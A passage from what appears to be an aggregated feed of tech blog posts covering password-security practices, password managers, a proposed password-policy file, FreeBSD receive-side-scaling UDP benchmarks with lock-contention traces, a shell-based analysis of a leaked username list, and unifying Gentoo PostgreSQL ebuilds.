  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. Alternative one-time passwords can benefit the use of the application on public terminals that can’t be trusted to be secure from keylogging.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, you may use the same TOTP parameters as Google Authenticator uses, effectively enabling your users to use the multiple applications designed to serve that purpose (a small sketch follows after this list).
  7. And most importantly, never ever send the user’s password back to him or show it to him. For preventing mistakes, ask the user to type the password twice. For providing password recovery, generate and send a pseudorandom authorization token, and ask the user to set a new password after using it.
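
Expanding on point 6, a minimal sketch using oathtool (the base32 secret here is a throwaway example): Google Authenticator compatibility essentially boils down to sharing a base32 secret and using the default 30-second time step.
# Print the current 6-digit TOTP code for the shared secret (-b marks it as base32).
oathtool --totp -b 'JBSWY3DPEHPK3PXP'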

Best practices for user management of passwords

With server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t — or often shouldn’t — control it, he should encourage the user to follow best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, a weak password should merely trigger a warning rather than a fatal error.
  2. Using different passwords for separate applications, to reduce the damage if an attack results in one of the secrets being obtained.
  3. If the user can’t memorize the password, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, as well as dedicated applications such as KeePass. An example of the latter is Entropass, which uses a user-provided master password and a salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.
A key point is that all the good practices should be encouraged, and the developer should never attempt to force them. If there should be any limitations on allowed passwords, they should be rather technical and rather flexible.

If there is to be a minimum length for a password, it should only focus on withstanding the first round of a brute-force attack. Technically speaking, any limitation actually reduces entropy, since the attacker can safely omit short passwords. However, with the number of possibilities growing so quickly with length, this hardly matters.

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?

The worst case is the sites that do not support setting your own password, and instead force you to use a password generated using some kind of pseudo-random algorithm. Simply put, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting low upper limits on passwords is not a good idea either. It is reasonable to set some technical limitations, say, 255 bytes of printable ASCII characters. However, setting the limit much lower may actually reduce the strength of some users’ passwords and collide with some of the derived keys.

Lastly, the service should clearly state when it may ask for the user’s password and how to check the authenticity of the request. This can involve generic instructions covering TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on the login form.

Having a transparent security-related announcements policy and information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.

phpMyFAQ 2.8.13 Released!

by Thorsten via phpMyFAQ devBlog »

The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.13, the “Joachim Fuchsberger” release. This release fixes multiple security vulnerabilities; all users of affected phpMyFAQ versions are encouraged to upgrade to this latest version as soon as possible! A detailed security advisory is available. We also added SQLite3 support, backported from phpMyFAQ 2.9. […]

My thoughts on the Self-Hosting Solution

by Flameeyes via Flameeyes's Weblog »

You probably noticed that in the (frequent) posts talking about security and passwords lately, I keep suggesting LastPass as a password manager. This is the manager that I use myself, and the reason why I came to this one is multi-faceted, but essentially I'm suggesting you use a tool that does not make it more inconvenient to maintain proper password hygiene. Because yes, you should be using different passwords, with a combination of letters, numbers and symbols, but if you have to come up with a new one every time, then things are going to be difficult and you'll just decide to use the same password over and over.

Or you'll use a method for having "unique" passwords that are actually composed of a fixed part and a variable one (which is what I used for the longest time). And let's be clear: using the same base password suffixed with the name of the site you're signing up for is not a protection at all, the moment more than one of your passwords is discovered.

So convenience being important, because inconvenience just leads to bad security hygiene, LastPass delivers on what I need: it has autofill, so I don't have to open a terminal and run sgeps (like I used to) to get the password out of the store; it generates the password in the browser, so I don't have to open a terminal and run pwgen; it runs on my cellphone, so I can use it to fetch the password to type somewhere else; and it even auto-fills my passwords in Android apps, so I don't have to use a simple password when dealing with some random website that then has a matching app on my phone. But it also has a few good "security conveniences": you can re-encrypt your Vault with a new master password, you can use a proper OTP pad or a 2FA device to protect it further, and they have some extras such as letting you know if the email addresses you use across services are involved in an account breach.

This does not mean there are no other good password management tools; I know the names of plenty, but I just looked for one that had the features I cared about, and I went with it. I'm happy with LastPass right now. Yes, I need to trust the company and their code a fair bit, but I don't think that just being open source would gain me more trust. Being open source and audited for a long time, sure, but I don't think either way it's a dealbreaker for me. I mean, Chrome itself has a password manager, it just doesn't feel suitable for me (no generation, no obvious way to inspect the data from mobile, sometimes bad collation of URLs, and as far as I know no way to change the sync encryption password). It also requires me to have access to my Google account to get that data.

But the interesting part is how geeks will quickly suggest that you just roll your own, be it using some open-source password manager requiring an external sync system (I did that with sgeps, but it's tied to a single GPG key, so it's not easy for me, having two different hardware smartcards), or even your own sync infrastructure. And this is what I really can't stand as an answer, because it solves absolutely nothing. Jürgen called it cynical last year, but I think it's even worse than that: it's hypocritical.

Roll-your-own or host-your-own are, first of all, not going to be options for the people who have no intention of learning how computer systems work — and I can't blame them, I don't want to know how my fridge or dishwasher work, I just want them working. People don't care to learn that you can get file A onto computer B, but then if you change it on both while offline you'll have collisions, so now you've lost one of the two changes. They either have no time, or just no interest, or (but I don't think that happens often) no skill to understand that. And it's not just the random young adult that ends up registering on xtube because they have no idea what it means. Jeremy Clarkson had to learn the hard way what it means to publish your bank details to the world.

But I think it's more important to think of the amount of people who think that they have the skills and the time, and then are found lacking one or both of them. Who do you think can protect your content (and passwords) better? A big company with entire teams dedicated to security, or an average 16-year-old guy who thinks he can run the website's forum? — The reference here is to myself: back in 2000/2001 I used to be the forum admin for an Italian gaming community. We got hacked, multiple times, and every time it was for me a new discovery of what security is. At the time third-party forum hosting was reserved for paying customers, and the results have probably been terrible. My personal admin password matched one of my email addresses up until last week, and I know for a fact that at least one group of people got access to the password database, where the passwords were stored in plain text.

Yes, it is true that targets such as Adobe will lead to many more valid email addresses and password hashes than your average forum, but as the "fake" 5M accounts should have shown you, targeting enough small fish can lead to just about the same results, if not better, as you may be lucky and stumble across two passwords for the same account, which allows you to overcome the above-mentioned similar-but-different passwords strategy. Indeed, as I noted in my previous post, Comic Book Database admitted to being the source of part of that dump, and it lists at least four thousand public users (contributors). Other sites such as MythTV Talk or PoliceAuctions.com, both also involved, have no such statement either.

This is not just a matter of the security of the code itself, so the "many eyes" answer does not apply. It is very well possible to have a screw-up with an open source program as well, if it's misconfigured, or if a vulnerable version doesn't get updated in time because the admin just has no time. You see that all the time with WordPress and its security issues. Indeed, the reason why I don't migrate my blog to WordPress is that I won't ever have enough time for it.

I have seen people, geeks and non-geeks both, taking the easy way out too many times, blaming Apple for the nude celebrity pictures or Google for the five million accounts. It's a safe story: "the big guys don't know better", "you just should keep it off the Internet", "you should run your own!" At the end of the day, both turned out to be collections, assembled from many small cuts, either targeted or not, in part due to people's bad password hygiene (or operational security if you prefer a more geek term), and in part due to the fact that nothing is perfect.

FreeBSD 10.1-BETA1 Available

by Webmaster Team via FreeBSD News Flash »

The first BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

Make password management better

by Flameeyes via Flameeyes's Weblog »

When I posted my previous post on accounts on Google+ I received a very interesting suggestion that I would like to bring to the attention of more people. Andrew Cooks pointed out that what LastPass (and other password managers) really need is a way to specify the password policy programmatically, rather than crowdsourcing this data as LastPass is doing right now.

There are already a number of cross-product specifications of fixed-path files used to describe site parameters, such as robots.txt or sitemap.xml. While cleaning up my blog's image serving I also found that there is a rules.abe file used by the NoScript extension for Firefox. Along the same lines, one could add a new password-policy.txt file to define some parameters of the website's password policy.

Things like the minimum and maximum length of the password, which characters are allowed, whether it is case sensitive or not. This is important information that all password managers need to know, and, as I said, not all websites make it clear to the user either. I'll recount two different horror stories, one from the past and one more recent, that show why this is important.

The first story is from almost ten years ago. I registered with the Italian postal service and selected a "strong" (not really) password, 11 characters long. It was not really dictionary-based, but it was close enough if you knew my password pattern. Anyway, I liked the idea of having a long password. I signed up, I logged back in, everything worked. Until a few months later, when I decided I wanted to fetch that particular mailbox from GMail — yes, the Italian postal service gives you an email box; no, I don't want to comment further on that.

What happened is that the moment I tried to set up mail fetching on GMail, it kept failing authentication. And I was sure I was using the right password, the one I had insisted on using up to that point! I could log in on the website just fine with it, so what gives? A quick check of the password that my browser (I think Firefox at the time) thought belonged to that website showed me the truth: the password I had been using to log in did not match the one I tried to use from GMail: the last character was missing. Some further inspection of the postal service website showed that the password fields, both on the password change and login pages (and, I assumed at the time, the registration page, for obvious reasons), set a maxlength of 10. So of course, as long as I typed or pasted the password into the field, the way I typed it when I registered, it worked perfectly fine, but when I tried to log in out of band (through POP3) it used the password as I intended, and failed.

A similar, more recent story happened with LastMinute. I went to change my password during my recent spree of updating all my passwords, even for accounts not in use (mostly to make sure that they don't get leaked and allow people to do crazy stuff to me). My default password generator on LastPass is set to generate 32-character passwords. But that did not work for LastMinute, or rather, it only appeared to. It let me change my password just fine, but when I tried logging back in, well, it did not work. Yes, this is the reason I try to log back in right after generating a password: I've seen this happen before. In this case, the problem was the length of the password.

But just having a proper range for the password length wouldn't be enough. Other details that would be useful are for instance the allowed symbols; I have found that sometimes I need to either generate a number of passwords to find one that does not have one of the disallowed symbols but still has some, or give up on the symbols altogether and ask LastPass to generate only letters and numbers. Or having a way to tell that the password is case sensitive or not — because if it is not, what I do is disable the generation of one set of letters, so that it randomises them better.

But there is more metadata that could be of use there — things like which domains should the password be used with, for instance. Right now LastPass has a (limited) predefined list of equivalent domains, and hostnames that need to match exactly (so that bugs.gentoo.org and forums.gentoo.org are given different passwords), while it's up to you to build the rest of the database. Even for the Amazon domains, the list is not comprehensive and I had to add quite a few when logging in the Italian and UK stores.

Of course, if any site could simply declare that it uses the same password as, say, google.com, you'd have a problem. What you need is a reciprocal indication that both sites consider each other equivalent, basically by serving the same file. This makes the implementation a bit more complex, but it should not be too difficult, as those kinds of sites tend to at least share robots.txt (okay, not in the case of Amazon), so distributing one more file should not be that hard.
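
For completeness, here is a rough sketch (in Python) of how a password manager could check such a reciprocal declaration, assuming a hypothetical equivalent-domain field served from the same well-known path on both sites; neither the field nor the path exists today, they are made up for the illustration.

import urllib.request

def declared_equivalents(domain, path="/password-policy.txt"):
    """Fetch the hypothetical policy file from a domain and return the set
    of domains it declares as password-equivalent."""
    with urllib.request.urlopen("https://%s%s" % (domain, path), timeout=10) as resp:
        text = resp.read().decode("utf-8", "replace")
    equivalents = set()
    for line in text.splitlines():
        if line.lower().startswith("equivalent-domain:"):
            equivalents.add(line.split(":", 1)[1].strip().lower())
    return equivalents

def mutually_equivalent(domain_a, domain_b):
    # Only treat the two sites as sharing credentials if each names the other.
    return (domain_b in declared_equivalents(domain_a)
            and domain_a in declared_equivalents(domain_b))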

I'm not sure if anybody is going to work on implementing this, or writing a proper specification for it, rather than a vague rant on a blog, but hope can't die, right?

Receive side scaling: testing UDP throughput

by Adrian via Adrian Chadd's Ramblings »

I think it's about time I shared some more details about the RSS stuff going into FreeBSD and how I'm testing it.

For now I'm focusing on IPv4 + UDP on the Intel 10GE NICs. The TCP side of things is done (and the IPv6 side of things works too!) but enough of the performance walls show up in the IPv4 UDP case that it's worth sticking to it for now.

I'm testing on a pair of 4-core boxes at home. They're not special - and they're very specifically not trying to be server-class hardware. I'd like to see where these bottlenecks are even at low core count.

The test setup in question:

Testing software:

  • http://github.com/erikarn/freebsd-rss
  • It requires libevent2 - an updated copy; previous versions of libevent2 didn't handle FreeBSD-specific errors gracefully and would error out of the IO loop early.

Server:

  • CPU: Intel(R) Core(TM) i5-3550 CPU @ 3.30GHz (3292.59-MHz K8-class CPU)
  • There's no SMT/HTT, but I've disabled it in the BIOS just to be sure
  • 4GB RAM
  • FreeBSD-HEAD, amd64
  • NIC: 82599EB 10-Gigabit SFI/SFP+ Network Connection
  • ix0: 10.11.2.1/24
/etc/sysctl.conf:

# for now redirect processing just makes the lock overhead suck even more.
# disable it.
net.inet.ip.redirect=0
net.inet.icmp.drop_redirect=1
/boot/loader.conf:

hw.ix.num_queues=8

# experiment with deferred dispatch for RSS
net.isr.numthreads=4
net.isr.maxthreads=4
net.isr.bindthreads=1
 
kernel config:

include GENERIC
ident HACKBOX

device netmap
options RSS
options PCBGROUP

# in-system lock profiling
options LOCK_PROFILING

# Flowtable - the rtentry locking is a bit .. slow.
options   FLOWTABLE

# This debugging code has too much overhead to do accurate
# testing with.
nooptions         INVARIANTS
nooptions         INVARIANT_SUPPORT
nooptions         WITNESS
nooptions         WITNESS_SKIPSPIN

The server runs the "rss-udp-srv" process, which behaves like a multi-threaded UDP echo server on port 8080.

Client

The client box is slightly more powerful to compensate for (currently) not using completely affinity-aware RSS UDP transmit code.

  • CPU: Intel(R) Core(TM) i5-4460  CPU @ 3.20GHz (3192.68-MHz K8-class CPU)
  • SMT/HTT: Disabled in BIOS
  • 8GB RAM
  • FreeBSD-HEAD amd64
  • Same kernel config, loader and sysctl config as the server
  • ix0: configured as 10.11.2.2/24, 10.11.2.3/32, 10.11.2.4/32, 10.11.2.32/32, 10.11.2.33/32
The client runs 'udp-clt' programs to source and sink traffic to the server.

Running things

The server-side simply runs the listen server, configured to respond to each frame:

$ rss-udp-srv 1 10.11.2.1

The client-side runs four instances of udp-clt, each from a different IP address. These are run in parallel (I do it in different screens, so I can quickly see what's going on):

$ ./udp-clt -l 10.11.2.3 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.4 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.32 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.33 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510

The IP addresses are chosen so that the 2-tuple Toeplitz hash, using the default Microsoft key, hashes them to different RSS buckets that live on individual CPUs.
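
For the curious, the sketch below (Python, for illustration only) shows how that 2-tuple Toeplitz hash is computed. The key is the commonly published Microsoft verification-suite key, and mapping the hash to a bucket with a simple modulo is a simplification; the key in use and the exact bucket mapping on a given FreeBSD setup may differ.

import ipaddress

# 40-byte key from Microsoft's RSS verification suite (an assumption here;
# the kernel/NIC may be configured with a different key).
MS_RSS_KEY = bytes([
    0x6d, 0x5a, 0x56, 0xda, 0x25, 0x5b, 0x0e, 0xc2,
    0x41, 0x67, 0x25, 0x3d, 0x43, 0xa3, 0x8f, 0xb0,
    0xd0, 0xca, 0x2b, 0xcb, 0xae, 0x7b, 0x30, 0xb4,
    0x77, 0xcb, 0x2d, 0xa3, 0x80, 0x30, 0xf2, 0x0c,
    0x6a, 0x42, 0xb7, 0x3b, 0xbe, 0xac, 0x01, 0xfa,
])

def toeplitz_hash(key, data):
    """Classic Toeplitz hash: for every set bit of the input, XOR in the
    32-bit window of the key that starts at that bit position."""
    key_int, key_bits = int.from_bytes(key, "big"), len(key) * 8
    data_int, data_bits = int.from_bytes(data, "big"), len(data) * 8
    result = 0
    for i in range(data_bits):
        if data_int & (1 << (data_bits - 1 - i)):
            result ^= (key_int >> (key_bits - 32 - i)) & 0xFFFFFFFF
    return result

def rss_bucket(src, dst, nbuckets=8):
    # 2-tuple input: source address followed by destination address.
    data = ipaddress.ip_address(src).packed + ipaddress.ip_address(dst).packed
    # Simplified bucket selection from the low-order hash bits.
    return toeplitz_hash(MS_RSS_KEY, data) % nbuckets

for src in ("10.11.2.3", "10.11.2.4", "10.11.2.32", "10.11.2.33"):
    print(src, "->", rss_bucket(src, "10.11.2.1"))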

Results: Round one

When the server is responding to each frame, the following occurs. The numbers are "number of frames generated by the client (netstat)", "number of frames received by the server (netstat)", "number of frames seen by udp-rss-srv", "number of responses transmitted from udp-rss-srv", and "number of response frames transmitted by the server (netstat)":
  • 1 udp-clt process: 710,000; 710,000; 296,000; 283,000; 281,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 592,000; 592,000; 575,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 636,000; 636,000; 600,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 255,000; 255,000; 255,000
So, it's not actually linear past two cores. The question here is: why?

There are a couple of parts to this.

Firstly - I had left turbo boost on. What this translated to:

  • One core active: ~ 30% increase in clock speed
  • Two cores active: ~ 30% increase in clock speed
  • Three cores active: ~ 25% increase in clock speed
  • Four cores active: ~ 15% increase in clock speed.
Secondly and more importantly - I had left flow control enabled. This made a world of difference.

The revised results are mostly linear - with more active RSS buckets (and thus CPUs) things seem to get slightly more efficient:
  • 1 udp-clt process: 710,000; 710,000; 266,000; 266,000; 266,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 512,000; 512,000; 512,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 810,000; 810,000; 810,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 1,120,000; 1,120,000; 1,120,000

Finally, let's repeat the process, but only receiving packets instead of also echoing them back to the client:

$ rss-udp-srv 0 10.11.2.1
  • 1 udp-clt process: 710,000; 710,000; 204,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 378,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 645,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 900,000
The receive-only workload actually fares worse than the transmit + receive workload!

What's going on here?

Well, a little digging shows that in both instances - even with a single udp-clt thread running which means only one CPU on the server side is actually active! - there's active lock contention.

Here's an example dtrace output for measuring lock contention with only one active process, where one CPU is involved (and the other three are idle):

Receive only, 5 seconds:

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # dtrace -n 'lockstat:::adaptive-block { @[stack()] = sum(arg1); }'
dtrace: description 'lockstat:::adaptive-block ' matched 1 probe
^C

              kernel`udp_append+0x11c
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
         46729281


Transmit + receive, 5 seconds:

dtrace: description 'lockstat:::adaptive-block ' matched 1 probe
^C

              kernel`knote+0x7e
              kernel`sowakeup+0x65
              kernel`udp_append+0x14a
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
             3793

              kernel`udp_append+0x11c
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
          3823793

              kernel`ixgbe_msix_que+0xd3
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
          9918140

Somehow it seems there's less lock contention / blocking going on when both transmit and receive is running!

So then I dug into it using the lock profiling suite. This is for 5 seconds with receive-only traffic on a single RSS bucket / CPU (all other CPUs are idle):

# sysctl debug.lock.prof.enable=1 ; sleep 5 ; sysctl debug.lock.prof.enable=0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl debug.lock.prof.enable=1 ; sleep 5 ; sysctl debug.lock.prof.enable=0
debug.lock.prof.enable: 1 -> 1

debug.lock.prof.enable: 1 -> 0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl debug.lock.prof.stats | head -2 ; sysctl debug.lock.prof.stats | sort -nk4 | tail -10
debug.lock.prof.stats: 
     max  wait_max       total  wait_total       count    avg wait_avg cnt_hold cnt_lock name
    1496         0       10900           0          28    389      0  0      0 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2755 (sx:USB config SX lock)
debug.lock.prof.stats: 
       0         0          31           1          67      0      0  0      4 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:888 (spin mutex:sched lock 2)
       0         0        2715           1       49740      0      0  0      7 /usr/home/adrian/work/freebsd/head/src/sys/dev/random/random_harvestq.c:294 (spin mutex:entropy harvest mutex)
       1         0          51           1         131      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:1179 (spin mutex:sched lock 1)
       0         0          69           2         170      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:886 (spin mutex:sched lock 2)
       0         0       40389           2      287649      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/kern_intr.c:1359 (spin mutex:sched lock 2)
       0         2           2           4          12      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2762 (sleep mutex:Giant)
      15        20        6556         520        2254      2      0  0    105 /usr/home/adrian/work/freebsd/head/src/sys/dev/acpica/Osd/OsdSynch.c:535 (spin mutex:ACPI lock (0xfffff80002b10f00))

       4         5      195967       65888     3445501      0      0  0  28975 /usr/home/adrian/work/freebsd/head/src/sys/netinet/udp_usrreq.c:369 (sleep mutex:so_rcv)

Notice the lock contention for the so_rcv (socket receive buffer) handling? What's going on here is pretty amusing - it turns out that because there's so much receive traffic going on, the userland process receiving the data is being preempted by the NIC receive thread very often - and when this happens, there's a good chance it's going to be within the small window that the receive socket buffer lock is held. Once this happens, the NIC receive thread processes frames until it gets to one that requires it to grab the same sock buffer lock that is already held by userland - and it fails - so the NIC thread sleeps until the userland thread finishes consuming a packet. Then the CPU flips back to the NIC thread and continues processing a packet.

When the userland code is also transmitting frames it's increasing the amount of time in between socket receives and decreasing the probability of hitting the lock contention condition above.

Note there's no contention between CPUs here - this is entirely contention within a single CPU.

So for now I'm happy that the UDP IPv4 path is scaling well enough with RSS on a single core. The main performance problem here is the socket receive buffer locking (and, yes, copyin() / copyout().)

Next!

How to analyze a dump of usernames

by Flameeyes via Flameeyes's Weblog »

There has been some noise around a leak of users/passwords pairs which somehow panicked people into thinking it was coming from a particular provider. Since it seems most people have not even tried looking at the account information available, I'd like to point out some ways that could have helped avoiding the panic, if only the reporters cared. It also fits nicely into my previous notes on accounts' churn.

But before proceeding let me make one thing straight: this post contains no information that is not available to the public and bears no relation to my daily work for my employer. Just wanted to make that clear. Edit: for the official response, please see this blog post of Google's Security blog.

To begin the analysis you need a copy of the list of usernames; Italian blogger Paolo Attivissimo linked to it in his post, but I'm not going to do so, especially since it's likely to become obsolete soon and might not be liked by many. The archive is a compressed list of usernames without passwords or password hashes. At first it seems to contain almost exclusively gmail.com addresses — in truth there are more, but it probably would not hit the news as hard to say that there are some 5 million addresses from a few thousand domains.

Let's first try to extract real email addresses from the file, which I'll call rawsource.txt — yes it does not match the name of the actual source file out there but I would rather avoid the search requests finding this post from the filename.

$ fgrep @ rawsource.txt > source-addresses.txt
This removes some two thousand lines that were not valid addresses — it turns out that the file actually contains some passwords, so let's process it a little more to get a bigger sample of valid addresses:

$ sed -i -e 's:|.*::' source-addresses.txt
This should make the next command give us a better estimate of the content:

$ sed -n -e 's:.*@::p' source-addresses.txt | sort | uniq -c | sort -n
[snip]
    238 gmail.com.au
    256 gmail.com.br
    338 gmail.com.vn
    608 gmail.com777
 123215 yandex.ru
4800129 gmail.com
So, as we were saying earlier, there are more than just Google accounts in this. A good chunk of them are on Yandex, but if you look at the outliers in the list there are plenty of other domains, including Yahoo. Let's just filter away the few thousand addresses using either broken or outlier domains and instead focus on these three providers:

$ egrep '@(gmail.com|yahoo.com|yandex.ru)$' source-addresses.txt > good-addresses.txt
Now things get more interesting, because to proceed to the next step you have to know how email servers and services work. For these three providers, and many default setups for postfix and the like, the local part of the address (everything before the @ sign) can contain a + sign; when that is found, the local part is split into user and extension, so that mail to nospam+noreally would be delivered to the user nospam. Servers generally ignore the extension altogether, but you can use it either to register multiple accounts on the same mailbox (like I do for PayPal, IKEA, Sony, …) or to filter the received mail into different folders. I know some people who think they can absolutely identify the source of spam this way — I'm a bit more skeptical: if I were a spammer I would drop the extension altogether. Only some very die-hard Unix fans would refuse inbound email without an extension, especially since I know plenty of services that don't accept email addresses with + in them.
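
The splitting rule itself is trivial; here is a tiny Python sketch of it (individual providers may of course differ in the details):

def split_plus_address(address):
    """Split an address into (user, extension, domain) following the
    plus-addressing convention described above; extension is None when
    the local part contains no '+'."""
    local, _, domain = address.partition("@")
    user, plus, extension = local.partition("+")
    return user, (extension if plus else None), domain

print(split_plus_address("nospam+noreally@example.com"))
# ('nospam', 'noreally', 'example.com')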

Since this is not very well known, there are going to be very few email addresses using this feature, but that's still good because it limits the amount of data to crawl through. Finding a pattern within 5M addresses is going to take a while, finding one in 4k is much easier:

$ egrep '.*\+.*@.*' good-addresses.txt | sed -e '/.*@.*@.*/d' > experts-addresses.txt
The second command filters out some false positives due to two addresses being on the same line; the result from the source file I started with is 3964 addresses. Now we're talking. Let's extract the extensions from those good addresses:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort > extensions.txt
The first obvious thing you can do is figure out if there are duplicates. While the single extensions are probably interesting too, finding a pattern is easier if you have people using the same extension, especially since there aren't that many. So let's see which extensions are common:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort | uniq -c -d | sort -n > common-extensions.txt
A quick look at that shows that a good chunk of the extensions used (the last line in the generated file) were referencing xtube – which you may or may not know as a porn website – reminding me of the YouPorn-related leak two and a half years ago. Scouring through the list of extensions, it's also easy to spot the words "porn" and "porno", and even "nudeceleb", which suggests the list is probably quite up to date.

Just looking at the list of extensions shows a few patterns. Things like friendster, comicbookdb (and variants like comics, comicdb, …) and then daz (dazstudio), and mythtv. As RT points out, these might very well be phishing attempts, but it is also quite possible that some of those smaller sites, such as comicbookdb, were breached and people just used the same passwords for their GMail address as for those services (I used to, too!), which is why I think mandatory registrations are evil.

The final automatic interesting discovery you can make involves checking for full domains in the extensions themselves:

$ fgrep . extensions.txt | sort -u
This will give you the extensions that include a dot in the name, many of which are actually proper site domains: xtube figures again, and so do comicbookdb, friendster, mythtvtalk, dax3d, s2games, policeauctions, itickets and many others.

What does this all tell me? I think this list was compiled from breaches of different small websites that wouldn't make a headline (and that most likely did not report the breach to their users!), plus some general phishing. Lots of the passwords that have been confirmed as valid most likely come from people reusing the same password across websites. This breach is fixed like every other before it: stop using the same password across different websites, start using something like LastPass, and use 2-factor authentication wherever possible.

Unifying PostgreSQL Ebuilds

by titanofold via titanofold »

After an excruciating wait and years of learning PostgreSQL, it’s time to unify the PostgreSQL ebuilds. I’m not sure what the original motivation was to split the ebuilds, but, from the history I’ve seen on Gentoo, it has always been that way. That’s a piss-poor reason for continuing to do things a certain way, especially when that way is wrong and makes things more tedious and difficult than they ought to be.

I’m to blame for pressing forward with splitting the ebuilds into -docs, -base, and -server when I first got started in Gentoo. I knew from the outset that having them split was not a good idea. I just didn’t know as much as I do now to defend one way or the other. To be fair, Patrick (bonsaikitten) would have gone with whatever I decided to do, but I thought I understood the advantages. Now I look at it and just see disadvantages.

Let’s first look at the build times for building the split ebuilds:

1961.35user 319.42system 33:59.44elapsed 111%CPU (0avgtext+0avgdata 682896maxresident)k
46696inputs+2000640outputs (34major+34350937minor)pagefaults 0swaps
1955.12user 325.01system 33:39.86elapsed 112%CPU (0avgtext+0avgdata 682896maxresident)k
7176inputs+1984960outputs (33major+34349678minor)pagefaults 0swaps
1942.90user 318.89system 33:53.70elapsed 111%CPU (0avgtext+0avgdata 682928maxresident)k
28496inputs+1999688outputs (124major+34343901minor)pagefaults 0swaps
And now the unified ebuild:

1823.57user 278.96system 30:29.20elapsed 114%CPU (0avgtext+0avgdata 683024maxresident)k
32520inputs+1455688outputs (100major+30199771minor)pagefaults 0swaps
1795.63user 282.55system 30:35.92elapsed 113%CPU (0avgtext+0avgdata 683024maxresident)k
9848inputs+1456056outputs (30major+30225195minor)pagefaults 0swaps
1802.47user 275.66system 30:08.30elapsed 114%CPU (0avgtext+0avgdata 683056maxresident)k
13800inputs+1454880outputs (49major+30193986minor)pagefaults 0swaps
So, the unified ebuild is about 10% faster than the split ebuilds.

There are also a few bugs open that will be resolved by moving to a unified ebuild. Whenever someone changes anything in their flags, Portage tends to only pick up dev-db/postgresql-server as needing to be recompiled rather than the appropriate dev-db/postgresql-base, which results in broken setups and failures to even build. I’ve even been accused of pulling the rug out from under people. I swear, it’s not me…it’s Portage…who I lied to. Kind of.

There should be little interruption, though, to the end user. I’ll be keeping all the features that splitting brought us. Okay, feature. There’s really just one feature: Proper slotting. Portage will be informed of the package moves, and everything should be hunky-dory with one caveat: A new ‘server’ USE flag is being introduced to control whether to build everything or just the clients and libraries.

No, I don’t want to do a lib-only flag. I don’t want to work on another hack.

You can check out the progress on my overlay. I’ll be working on updating the dependent packages as well so they’re all ready to go in one shot.

Ramblings on audiobooks

